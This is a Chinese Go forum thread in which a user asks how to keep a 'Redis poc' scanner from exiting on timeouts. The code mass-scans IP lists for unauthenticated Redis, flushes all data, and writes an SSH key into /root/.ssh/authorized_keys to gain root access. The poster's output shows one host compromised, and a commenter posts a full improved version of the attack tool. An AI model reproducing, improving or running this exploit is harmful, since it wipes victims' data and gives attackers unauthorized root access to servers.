请教大大这个程序该怎么修改才不会因为超时退出？

mango7158 · 2018-01-23 17:23:41 · 1123 次点击

package main

import (
    "bufio"
    "bytes"
    "fmt"
    "gopkg.in/redis.v3"
    "log"
    "os"
    "runtime"
    "strings"
    "time"
)

const rsa_key = "\n\n ssh-rsa \n\n"

// HostInfo struct
type HostInfo struct {
    host   string
    port   string
    reply  string
    is_vul bool
}

// help function
func Usage(cmd string) {
    fmt.Println(strings.Repeat("-", 50))
    fmt.Println("Redis poc")
    fmt.Println("Usage:")
    fmt.Printf("%s iplist \n", cmd)
    fmt.Println(strings.Repeat("-", 50))
}

// main function
func main() {
    runtime.GOMAXPROCS(runtime.NumCPU())

    if len(os.Args) != 2 {
        Usage(os.Args[0])
    } else {
        Usage(os.Args[0])
        iplist := os.Args[1]
        Scan(Prepare(iplist))
    }
}

// read line from file and Scan
func Prepare(iplist string) (slice_iplist []string) {
    iplistFile, _ := os.Open(iplist)
    defer iplistFile.Close()
    scanner := bufio.NewScanner(iplistFile)
    scanner.Split(bufio.ScanLines)
    for scanner.Scan() {
        slice_iplist = append(slice_iplist, scanner.Text())
    }

    return slice_iplist
}

//Test connect function
func TestConnect(host_info HostInfo, chan_result chan HostInfo) {
    host := host_info.host
    port := host_info.port
    reply := host_info.reply
    is_vul := false

    var buf bytes.Buffer
    logger := log.New(&buf, "logger: ", log.Ldate)

    client := redis.NewClient(&redis.Options{
        Addr:     host + ":" + port,
        Password: "", // no password set
        DB:       0,  // use default DB
    })

    _, err := client.Ping().Result()
    if err == nil {
        is_vul = true

        logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String())
        logger.Println(client.Save().String())
        logger.Println(client.FlushAll().String())

        client.Set("xsec", rsa_key, 0)
        logger.Println(client.ConfigSet("dir", "/root/.ssh/").String())
        logger.Println(client.ConfigGet("dir").String())
        reply = client.ConfigSet("dbfilename", "authorized_keys").String()
        logger.Println(reply)
        logger.Println(client.Save().String())
        fmt.Println(&buf)
    }

    host_info.is_vul = is_vul
    host_info.reply = reply
    chan_result <- host_info

}

// Scan function
func Scan(slice_iplist []string) {
    n := len(slice_iplist)
    chan_scan_result := make(chan HostInfo, n)
    done := make(chan bool, n)

    for _, host_port := range slice_iplist {
        // fmt.Printf("Try to connect %s\n", host_port)
        t := strings.Split(host_port, ":")
        host := t[0]
        port := t[1]
        host_info := HostInfo{host, port, "", false}

        go TestConnect(host_info, chan_scan_result)
        for runtime.NumGoroutine() > runtime.NumCPU()*200 {
            time.Sleep(10 * time.Microsecond)
        }

    }

    go func() {
        for i := 0; i < cap(chan_scan_result); i++ {
            select {
            case r := <-chan_scan_result:
                if r.is_vul {
                    fmt.Printf("%s:%s is vulnerability, get root's reply: %s\n", r.host, r.port, r.reply)
                }
            case <-time.After(60 * time.Second):
                fmt.Println("timeout")
                break

            }
            done <- true

        }
    }()

    for i := 0; i < cap(done); i++ {
        <-done
    }

}

目前问题是：timeout之后就结束任务了，我想知道修改哪里可以实现，遇到无法连接的IP就跳过继续执行下一个IP？

192.168.1.150:6379 is vulnerability, get root's reply: CONFIG SET dbfilename authorized_keys: OK
timeout
timeout
[root@CentOS ~]#

阅读全文

查看全部 6 个评论

mango7158

https://gist.github.com/mango7158/01c837111409795bd36881e31fc7d18b/revisions

目前问题是：timeout之后就结束任务了，我想知道修改哪里可以实现，遇到无法连接的IP就跳过继续执行下一个IP？

192.168.1.150:6379 is vulnerability, get root's reply: CONFIG SET dbfilename authorized_keys: OK timeout timeout [root@CentOS ~]#

评论于 2018-01-23 17:33:11

更多评论

lishihai

client := redis.NewClient(&redis.Options{
    Addr:     host + ":" + port,
    Password: "",
    DB:       0,
    DialTimeout: 60 * time.Second
})

defer client.Close()

通过redis入侵?

评论于 2018-01-24 10:40:30

victorl

按下面的方式就行了(只解决你的问题)。另外说一下：代码可读性很糟糕，命名不符合go的习惯。

package main

import (
    "bufio"
    "bytes"
    "context"
    "fmt"
    "log"
    "os"
    "runtime"
    "strings"
    "sync"
    "time"

    "gopkg.in/redis.v3"
)

const rsa_key = "\n\n ssh-rsa \n\n"

// HostInfo struct
type HostInfo struct {
    host   string
    port   string
    reply  string
    is_vul bool
    exit   chan interface{}
}

// help function
func Usage(cmd string) {
    fmt.Println(strings.Repeat("-", 50))
    fmt.Println("Redis poc")
    fmt.Println("Usage:")
    fmt.Printf("%s iplist \n", cmd)
    fmt.Println(strings.Repeat("-", 50))
}

// main function
func main() {
    runtime.GOMAXPROCS(runtime.NumCPU())

    if len(os.Args) != 2 {
        Usage(os.Args[0])
    } else {
        Usage(os.Args[0])
        iplist := os.Args[1]
        Scan(Prepare(iplist))
    }
}

// read line from file and Scan
func Prepare(iplist string) (slice_iplist []string) {
    iplistFile, _ := os.Open(iplist)
    defer iplistFile.Close()
    scanner := bufio.NewScanner(iplistFile)
    scanner.Split(bufio.ScanLines)
    for scanner.Scan() {
        slice_iplist = append(slice_iplist, scanner.Text())
    }

    return slice_iplist
}

//Test connect function
func TestConnect(host_info HostInfo, chan_result chan HostInfo) {
    host := host_info.host
    port := host_info.port
    reply := host_info.reply
    is_vul := false

    var buf bytes.Buffer
    logger := log.New(&buf, "logger: ", log.Ldate)

    client := redis.NewClient(&redis.Options{
        Addr:     host + ":" + port,
        Password: "", // no password set
        DB:       0,  // use default DB
    })

    _, err := client.Ping().Result()
    if err == nil {
        is_vul = true

        logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String())
        logger.Println(client.Save().String())
        logger.Println(client.FlushAll().String())

        client.Set("xsec", rsa_key, 0)
        logger.Println(client.ConfigSet("dir", "/root/.ssh/").String())
        logger.Println(client.ConfigGet("dir").String())
        reply = client.ConfigSet("dbfilename", "authorized_keys").String()
        logger.Println(reply)
        logger.Println(client.Save().String())
        fmt.Println(&buf)
    }

    host_info.is_vul = is_vul
    host_info.reply = reply
    chan_result <- host_info

}

// Scan function
func Scan(slice_iplist []string) {
    n := len(slice_iplist)
    chan_scan_result := make(chan HostInfo, n)

    waitGroup := &sync.WaitGroup{}
    for _, host_port := range slice_iplist {
        // fmt.Printf("Try to connect %s\n", host_port)
        t := strings.Split(host_port, ":")
        host := t[0]
        port := t[1]
        host_info := HostInfo{host, port, "", false, make(chan interface{})}

        waitGroup.Add(1)
        go func(wg *sync.WaitGroup, hostInfo HostInfo) {
            defer func() {
                <-hostInfo.exit
                wg.Done()
            }()
            TestConnect(hostInfo, chan_scan_result)
        }(waitGroup, host_info)

        for runtime.NumGoroutine() > runtime.NumCPU()*200 {
            time.Sleep(10 * time.Microsecond)
        }
    }

    ctx, cancel := context.WithCancel(context.Background())

    go func() {
        waitGroup.Wait()
        cancel()
    }()

    for {
        select {
        case r := <-chan_scan_result:
            if r.is_vul {
                fmt.Printf("%s:%s is vulnerability, get root's reply: %s\n", r.host, r.port, r.reply)
            }
            close(r.exit)
        case <-ctx.Done():
            fmt.Println("complete")
            break
        }
    }
}

评论于 2018-01-24 14:52:56

我要评论

请教大大这个程序该怎么修改才不会因为超时退出？

用户登录

今日阅读排行

一周阅读排行